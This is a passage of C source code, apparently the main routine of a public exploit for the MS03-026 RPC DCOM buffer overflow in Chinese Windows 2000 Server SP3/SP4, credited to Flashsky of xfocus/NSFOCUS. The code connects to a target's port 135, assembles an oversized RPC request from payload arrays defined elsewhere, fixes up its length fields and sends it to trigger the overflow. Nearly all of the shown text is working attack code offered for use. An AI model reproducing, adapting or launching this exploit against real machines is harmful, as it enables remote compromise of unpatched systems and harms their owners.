    int len, len1;
    struct sockaddr_in addr_in;
    short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    printf("RPC DCOM overflow vulnerability discovered by NSFOCUS\n");
    printf("Code by Flashsky, flashsky@xfocus.org\n");
    printf("Welcome to our site: http://www.xfocus.org\n");
    printf("Welcome to our site: http://www.venustech.com.cn\n");
    if (argc != 2)
    {
        printf("%s targetip\n", argv[0]);
        printf("for CN W2K Server SP3/SP4 MS03-26\n");
        return 1;   /* the original fell through here and then dereferenced argv[1] */
    }
    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0)
    {
        printf("WSAStartup error. Error: %d\n", WSAGetLastError());
        return 1;
    }
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(port);
    addr_in.sin_addr.s_un.s_addr = inet_addr(argv[1]);
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("socket failed. Error: %d\n", WSAGetLastError());
        return 1;
    }
    len1 = sizeof(request1);
    len = sizeof(sccnsp3sp4);
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                   NULL, NULL, NULL, NULL) == SOCKET_ERROR)
    {
        printf("Connect failed. Error: %d\n", WSAGetLastError());
        return 1;
    }
    memcpy(buf2, request1, sizeof(request1));
    /* file name length in wide characters */
    *(DWORD *)(request2)     = *(DWORD *)(request2)     + sizeof(sccnsp3sp4) / 2;
    *(DWORD *)(request2 + 8) = *(DWORD *)(request2 + 8) + sizeof(sccnsp3sp4) / 2;
    memcpy(buf2 + len1, request2, sizeof(request2));
    len1 = len1 + sizeof(request2);
    memcpy(buf2 + len1, sccnsp3sp4, sizeof(sccnsp3sp4));
    len1 = len1 + sizeof(sccnsp3sp4);
    memcpy(buf2 + len1, request3, sizeof(request3));
    len1 = len1 + sizeof(request3);
    memcpy(buf2 + len1, request4, sizeof(request4));
    len1 = len1 + sizeof(request4);
    /* fix up the length fields of the enclosing structures */
    *(DWORD *)(buf2 + 8)     = *(DWORD *)(buf2 + 8)     + len - 0xc;
    *(DWORD *)(buf2 + 0x10)  = *(DWORD *)(buf2 + 0x10)  + len - 0xc;
    *(DWORD *)(buf2 + 0x80)  = *(DWORD *)(buf2 + 0x80)  + len - 0xc;
    *(DWORD *)(buf2 + 0x84)  = *(DWORD *)(buf2 + 0x84)  + len - 0xc;
    *(DWORD *)(buf2 + 0xb4)  = *(DWORD *)(buf2 + 0xb4)  + len - 0xc;
    *(DWORD *)(buf2 + 0xb8)  = *(DWORD *)(buf2 + 0xb8)  + len - 0xc;
    *(DWORD *)(buf2 + 0xd0)  = *(DWORD *)(buf2 + 0xd0)  + len - 0xc;
    *(DWORD *)(buf2 + 0x18c) = *(DWORD *)(buf2 + 0x18c) + len - 0xc;
    if (send(sock, (char *)bindstr, sizeof(bindstr), 0) == SOCKET_ERROR)
    {
        printf("Send failed. Error: %d\n", WSAGetLastError());
        return 1;
    }
    len = recv(sock, (char *)buf1, 1000, 0);
    if (send(sock, (char *)buf2, len1, 0) == SOCKET_ERROR)
    {
        printf("Send failed. Error: %d\n", WSAGetLastError());
        return 1;
    }
    /* len = recv(sock, (char *)buf1, 1024, 0); */
    return 0;
}